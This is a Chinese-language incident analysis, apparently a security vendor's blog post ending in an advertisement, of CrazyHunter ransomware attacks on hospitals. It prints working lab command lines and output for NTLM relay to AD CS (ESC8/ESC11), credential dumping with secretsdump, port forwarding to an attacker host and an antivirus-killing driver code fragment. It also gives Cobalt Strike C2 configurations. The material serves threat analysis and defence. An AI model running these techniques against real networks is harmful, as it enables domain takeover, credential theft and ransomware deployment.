【案例分析】針對近期醫療院所面對 CrazyHunter 勒索軟體攻擊事件技術過程探討說明

本文係根據「衛生福利部資安資訊分享與分析中心」（H-ISAC: Hospital Cybersecurity Information Sharing and Analysis Center）公開情資與入侵指標（IOCs）進行技術研析。 透過 MITRE ATT&CK 威脅模型剖析勒索軟體可能採取的攻擊手法，並從藍隊角度思考可行之預防措施。相關技術研析僅供參考，具體攻擊概況仍需以實際現場調查的資安營運服務商所提供的報告為主。

前言

Initial Access 階段

• 網段範圍：192.x.x.x/16 以及 10.x.x.x/16
• 初始時間點：2 月 6 日攻擊者佔下「IIS Web」作為初始入侵點（initial foothold)，隨後展開內網掃描（資安服務提供商即時發出通報 ）。

fig.1

1. Actor 使用 Godzilla (a.ashx) 控制 IIS WEB
2. Actor 上傳 reGeorg (tunnel.aspx) 建立 Socks Proxy 轉發封包。利用 IIS WEB 掃描整個網域，尋找可存取 AD 的主機
3. 找到後，使用 reGeorg 透過 IIS WEB 連線到 「可存取 AD 的 SRV 主機」的 RDP(3389)
4. Actor 在 SRV 執行 netsh 將 8445 流量轉發到 123.123.123.123 的 445(SMB) Port
5. Actor 在 SRV 使用 PortBender 將本機的 445(SMB) 流量導到 8445 Port
6. Actor 使用 reGeorg 執行 PetitPotam.py 透過 IIS WEB 將封包傳到 AD
7. 此時，AD 會主動反連到 SRV 的 445(SMB)，裡面有 NTLM 認證資訊。
8. 此時， 445 封包會導到 8445 Port，傳至 123.123.123.123 主機。
9. ntlmrelayx 會使用 NTLM 認證資訊， 至 ADCS 要求 AD machine account 的憑證。
10. AD CS 會回傳 machine account 到攻擊者主機，拿到憑證之後可以使用 PtC 取得 NTLM hash，再使用 impacket-secretsdump 將 AD 所有的帳號及 NTLM 取出來。

fig.2

Privilege Escalation 階段

ESC8 漏洞

• 因 Web 服務預設支援NTLM 身份認證（預設無需簽章 )，因此可以使用 Printer Bug(MS-RPRN)、PetitPotam(MS-EFSRPC)等攻擊手法觸發漏洞。
• 這會使「目標主機（遭駭主機）」回連到指向的 「攻擊者控制的主機（開啟 NTLMRelayx 的主機）」，進而將收到的NTLM 身份認證封包導向「ADCS Web」去註冊一個「目標主機（遭駭主機）」的憑證。
• 拿到主機憑證後即可使用 Pass-the-Certificate（gettgtpkinit.py、certipy）進行登入，或再進一步取得主機的NTLM Hash（U2U）。

ESC8 漏洞 - 以 GOAD 環境做攻擊範例

```
┌──(vagrant㉿kali)-[~]
└─$ impacket-ntlmrelayx -t http://braavos.essos.local/certsrv/certfnsh.asp -smb2support --adcs --template 'DomainController' --no-http-server --no-wcf-server --no-raw-server
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server

[*] Servers started, waiting for connections
```

• username: missandei
• password: fr3edom

    ┌──(vagrant㉿kali)-[~/PetitPotam]
    └─$ python3 PetitPotam.py -u missandei -p fr3edom -d essos.local -dc-ip 192.168.56.12 192.168.56.111 192.168.56.12 -pipe all
    
                  ___            _        _      _        ___            _
                 | _ \   ___    | |_    （_）   | |_     | _ \   ___    | |_    __ _    _ __
                 |  _/  / -_）  |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \
                _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_|
              _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
              "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
                  PoC to elicit machine account authentication via some MS-EFSRPC functions
                                          by topotam（@topotam77)
  
                         Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
  
    Trying pipe efsr
    [-] Connecting to ncacn_np:192.168.56.12[\PIPE\efsrpc]
    [+] Connected!
    [+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d
    [+] Successfully bound!

  
  

    ┌──(vagrant㉿kali)-[~]
    └─$ impacket-ntlmrelayx -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template 'DomainController' --dump-adcs
     [*] Authenticating against http://192.168.56.23 as ESSOS/MEEREEN$ SUCCEED
    [*] SMBD-Thread-17（process_request_thread): Received connection from 192.168.56.12, attacking target http://192.168.56.23
    [*] Generating CSR...
    [*] HTTP server returned error code 200, treating as a successful login
    [*] Authenticating against http://192.168.56.23 as ESSOS/MEEREEN$ SUCCEED
    [*] CSR generated!
    [*] Getting certificate...
    [*] GOT CERTIFICATE! ID 33
    [*] Writing PKCS#12 certificate to ./MEEREEN$.pfx
    [*] Certificate successfully written to file

    ┌──(vagrant㉿kali)-[~]
    └─$ certipy auth -pfx 'MEEREEN$.pfx'
    Certipy v4.8.2 - by Oliver Lyak（ly4k)

    [*] Using principal: [email protected]
    [*] Trying to get TGT...
    [*] Got TGT
    [*] Saved credential cache to 'meereen.ccache'
    [*] Trying to retrieve NT hash for 'meereen$'
    [*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:48e559f0ed4d8cda8b312e1e3dc9b383


    ┌──(vagrant㉿kali)-[~]
    └─$ impacket-secretsdump 'essos.local/meereen$@meereen' -dc-ip 192.168.56.12 -hashes :48e559f0ed4d8cda8b312e1e3dc9b383
    Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

    [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
    [*] Dumping Domain Credentials（domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    
    ┌──(vagrant㉿kali)-[~]
    └─$ certipy relay -target 'http://192.168.56.23' -template DomainController
    Certipy v4.8.2 - by Oliver Lyak（ly4k)
    
    [*] Targeting http://192.168.56.23/certsrv/certfnsh.asp（ESC8)
    [*] Listening on 0.0.0.0:445
    []
    ESSOS\MEEREEN$
    [*] Requesting certificate for 'ESSOS\\MEEREEN$' based on the template 'DomainController'
    []
    [*] Got certificate with DNS Host Name 'meereen.essos.local'
    [*] Certificate has no object SID
    [*] Saved certificate and private key to 'meereen.pfx'
    [*] Exiting...

• 先設好 8888 port，這裡簡單使用 netsh 進行展示。也可以使用 Cobalt Strike

  • 遭駭跳板主機: 192.168.222.10
  • 攻擊者主機: 192.168.222.129

      netsh interface portproxy add v4tov4 listenport=8888 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.222.129

• 執行 PortBender 指令，將 445 port 的流量導到 8888 port。

    PortBender.exe redirect 445 8888

  
  

smbclient '\\192.168.222.10\c$' -U 'administrator%password'

• ESC8：走 HTTP 註冊憑證，因為有開啟 Web 方式申請憑證。
• ESC11：走 RPC [MS-ICPR] 註冊憑證（無開啟 Web 方式申請憑證）。

ESC11 漏洞

ntlmrelayx.py -t "rpc://192.168.56.23" -rpc-mode ICPR -icpr-ca-name "ESSOS-CA" -smb2support --adcs --template 'DomainControllerAuthentication'

certipy relay -target 'rpc://192.168.56.23' -ca 'ESSOS-CA'

fig.3

Collection 階段

Defense Evasion 階段

fig.4

|| AV Killer

• aa.exe/cc.exe：有些許混淆。
• av-1m.exe 以及 av-500kb.exe：有更多的混淆，只是寫了兩個不同大小的混淆版本。
• **go.exe 以及 go2.exe：使用 Golang 撰寫，檔案大小較大，會比 c 語言寫的好繞過防毒。

|| aa.exe / cc.exe

start C:\Users\Public\aa.exe --path C:\Users\Public\zam64.sys --loop
start C:\Users\Public\cc.exe --path C:\Users\Public\zam64.sys --loop

fig.5

• Trend Micro OfficeScan 防毒

  • EndpointBasecamp.exe、NisSrv.exe、PccNt.exe、PccNTMon.exe、TmListen.exe、Ntrtscan.exe、NTRTScan.exe、TMBMSRV.exe、TmCCSF.exe、CNTAoSMgr.exe
• Microsoft Defender for Endpoint（MDE）防毒

  • MsMpEng.exe、MsSense.exe、SecurityHealthService.exe、SenseTVM.exe

fig.6

延伸討論
關於 Zemana AntiMalware 驅動程式被濫用已不是什麼新鮮事，有興趣可參考 Reverse Engineering Terminator aka Zemana AntiMalware/AntiLogger Driver

#define REGISTER_PROCESS 0x80002010
#define TERMINATE_PROCESS 0x80002048
...
    DWORD dwProcessId = GetCurrentProcessId();
    if（!DeviceIoControl(hDevice, REGISTER_PROCESS, &dwProcessId, sizeof(dwProcessId), NULL, 0, NULL, NULL)）{
        printf("[-] failed to register current process\n");
        exit(1);
    }
    printf("[+] registered current process as a trusted process\n");

    if（!DeviceIoControl(hDevice, TERMINATE_PROCESS, &dwTargetProcess, sizeof(dwTargetProcess), NULL, 0, NULL, NULL)）{
        printf("[-] could not kill process %d\n", dwTargetProcess);
        exit(1);
    };
    printf("[+] killed process %d", dwTargetProcess);

C:\test>aa
Service is already running.
Terminating PccNt.exe with PID: 1560
Terminating PccNt.exe with PID: 3600
Terminating PccNt.exe with PID: 6644

|| av-500kb.exe / av-1m.exe

fig.7

Impact 階段

|| Prince-Ransomware

fig.8

• 可以看到加密程式在進行檔案內容的處理，這裡的 cipher 是：

fig.9

fig.10

Donut loader

fig.11

1. crazyhunter.exe : 使用 Golang 直接編譯出來的
2. bb.exe 以及 crazyhunter.sys : Donut 做免殺的版本

|| bb.exe

|| crazyhunter.sys / hunter.ini

fig.12

延伸討論
關於 Donut 可參考 thewover 所撰寫的文章。

|| SharpGPO

延伸討論
攻擊者沒有選擇常見的 Logon Script 的方式，主要可能是因為使用 Logon Script 只有開機、關機才會被觸發，但若使用 工作排程 的話，只需設好 GPO，有加入網域的主機將會在 90 ~ 120 分鐘會去抓取 Policy 下來自動套用。

fig.13

Command and Control 階段

延伸討論
猜測此 IoC 應該是此連串事件另一個受攻擊醫院（彰化基督教醫院）的樣本，因為後門產生的日期為 「3 月 1 日」 和 「3 月 2 日」 （03-01 15:14:40.3686863、03-02 01:35:55.4274015）。

|| Cobalt Strike

appitob.exe 解析

fig.14

fig.15

fig.16

fig.17

appitob.exe 關聯

• Watermark 可以看出攻擊者使用 盜版的 Cobalt Strike。
• HttpPostUri、HttpGet_Metadata 中出現了 /omp/lwpV2 、oa.dingtalk.com 。 再用這些關鍵字去查，可以發現是 钉钉(DingTalk)管理后台(oa.dingtalk.com)，為中國阿里巴巴集團推出的企業版即時通訊軟體。

fig.18

延伸討論
關於 C2 使用 Dev Tunnels 可以看下列文章。

• Golang Beacons and VS Code Tunnels: Tracking a Cobalt Strike Server Leveraging Trusted Infrastructure
  
• Using Microsoft Dev Tunnels for C2 Redirection
  
• Microsoft Dev Tunnels: Tunnelling C2 and More
  

BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 10000
MaxGetSize                       - 4199144
Jitter                           - 50
MaxDNS                           - Not Found
PublicKey_MD5                    - e302076fc6a339ced4681004610955a1
C2Server                         - hg7wx7t7-443.usw3.devtunnels.ms,/omp/api/micro_app/get_org_app
UserAgent                        - Mozilla/5.0（Windows NT 10.0; Win64; x64）AppleWebKit/537.36（KHTML, like Gecko）Chrome/109.0.5396.2 Safari/537.36
HttpPostUri                      - /omp/lwpV2
Malleable_C2_Instructions        - Remove 2049 bytes from the end
                                   Remove 2049 bytes from the beginning
                                   Remove 734 bytes from the beginning
                                   NetBIOS decode 'a'
                                   XOR mask w/ random key
HttpGet_Metadata                 - ConstHeaders
                                        Accept-Encoding: gzip, deflate
                                        X-Csrf-Token: FCWUko5DL5gEECJg12I7B2
                                        Accept-Language: zh-CN,zh;q=0.9
                                        Referer: https://oa.dingtalk.com/
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                   Metadata
                                        base64
                                        base64url
                                        prepend "ANID="
                                        prepend "__Secure-3PAPISID=noskin;xlly_s=1;dd_home_locale=zh-cn;stayLogin=false;dd_n=CN;"
                                        append ";CONSENT=YES+CN.zh-CN+20210917-09-0"
                                        header "Cookie"
...
HostHeader                       - Host: hg7wx7t7-443.usw3.devtunnels.ms
...

svc.exe 解析

fig.19

• main.go: Golang 的原始碼
• key : 裡面是「時間」
• shellcode: 被加密的 Payload (beacon.bin)
• result.exe: 之後 shellcode 會使用 go build 將 main.go 編成 result.exe。

fig.20

svc.exe 關聯

BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 5000
MaxGetSize                       - 2500000
Jitter                           - 0
MaxDNS                           - Not Found
PublicKey_MD5                    - e302076fc6a339ced4681004610955a1
C2Server                         - graph.microsoft.com,/_
...
HostHeader                       -
...

fig. 21

graphstrike.local
SystemFunction032
advapi32.dll
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789
graph.microsoft.com
login.microsoft.com
*/*
PUT
GET
4651eadc-3b6c-4879-a4e4-01d4fb7141ec
//oauth2/v2.0/token
/%s/oauth2/v2.0/token
28833923-9c7c-4633-9ba8-d5649a3a1612
wVM8Q~J6~eEJxLLtH6~pkJQP-Z1zSh77vQ4TJdft
grant_type=client_credentials&client_id=&client_secret=&scope=https%3A%2F%2F%2F.default
grant_type=client_credentials&client_id=%s&client_secret=%s&scope=https%%3A%%2F%%2F%s%%2F.default
POST
Host: login.microsoft.com
Content-Type: application/x-www-form-urlencoded
access_token":"
Host: %s
Authorization: %s
Host: %s
Authorization: %s
Content-Type: application/octect-stream
/v1.0/sites/lmsfo.sharepoint.com,33848383-f6d0-4cd8-a579-e61436f4dc34,f86c4965-b6ea-4e01-82e6-bb7605b2d02d/drive
%s/root:/%s:/content
id":"
/items//content
%s/items/%s/content
%s/root:/%s%s%s:/content
pD9-tK
/content
size":

• lmsfo 是企業或組織申請時的名稱。

fig. 22

延伸閱讀
關於 C2 使用 Microsoft Graph API 可以參考以下文章。

• GraphStrike: Anatomy of Offensive Tool Development
• Cobalt Strike HTTPS beaconing over Microsoft Graph API
• GraphStrike: Using Microsoft Graph API to Make Beacon Traffic Disappear
• Havoc: SharePoint with Microsoft Graph API turns into FUD C2

beacon_x64.exe 解析

如果有點懂密碼學的讀者，應該可以看出解密方式。 fig.23

可以看出有 4 組 DWORD 值，第一個是資料大小，第二個是 XOR Key。 fig.24

beacon_x64.exe 關聯

BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 10000
MaxGetSize                       - 4199144
Jitter                           - 50
MaxDNS                           - Not Found
PublicKey_MD5                    - e302076fc6a339ced4681004610955a1
C2Server                         - rh3qld1v-9998.aue.devtunnels.ms,/omp/api/get_page_config
...
HostHeader                       - Host: rh3qld1v-9998.aue.devtunnels.ms
...

結論

• 使用開源工具： 大多數的工具都為 GitHub 就能找到的既有公開工具、開源程式 攻擊者開發成本極低。
• 熟悉 AD 網域部署：從資安營運服務商發出告警事件，到攻擊者拿下網域時間極短，關閉防毒程式的程式碼也具有相當高的針對性。
• 善於隱匿 C2：後門都使用域前置的 C2 技巧，來躲避追蹤、製造斷點。
• 戰術靈活：攻擊者使用工具如果有原始碼，執行檔編譯日期為當下攻擊時間。

TeamT5 已協助多家國內外企業處理勒索事件攻擊，由獲獎團隊偕同企業一同應變，防禦多元的惡意程式入侵、抵擋持續演進的攻擊手法。
今天就聯絡我們，洽詢試用。

• 防禦交給專家 威脅精準應對：TeamT5 威脅偵測應變代管服務獲資安精品獎殊榮
  
• TeamT5 威脅偵測應變代管服務（MDR）介紹